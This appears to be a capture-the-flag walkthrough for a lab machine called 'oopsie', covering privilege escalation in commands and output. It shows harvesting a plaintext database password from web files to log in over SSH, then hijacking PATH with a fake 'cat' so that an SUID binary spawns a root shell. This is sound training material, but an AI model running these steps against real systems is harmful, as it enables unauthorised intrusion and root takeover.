3 box enum > privesc

cd /home
ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Jan 23  2020 .
drwxr-xr-x 24 root   root   4096 Jan 27  2020 ..
drwxr-xr-x  7 robert robert 4096 Apr 24 21:48 robert

grep -rnw /var/www/html/ -e robert 2>/dev/null
./cdn-cgi/login/db.php:2:$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

$ ssh robert@10.10.10.28
robert@oopsie:~$ whoami
robert

robert@oopsie:~$ sudo -l
[sudo] password for robert:
Sorry, user robert may not run sudo on oopsie.

LinPEAS

-rwsr-xr-- 1 root   bugtracker      8.6K Jan 25  2020 /usr/bin/bugtracker

--- Trying to execute /usr/bin/bugtracker with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3

robert@oopsie:~$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------

cat: /root/reports/10: No such file or directory

binary is trying to cat - without absolute path.

robert@oopsie:~$ cd /tmp
robert@oopsie:/tmp$ echo "/bin/bash" > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
robert@oopsie:/tmp$ export PATH="/tmp:$PATH"

robert@oopsie:/tmp$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 10
---------------

root@oopsie:/tmp# whoami
root

we cannot use cat anymore as we exploited it so either use `more` or `rm /tmp/cat`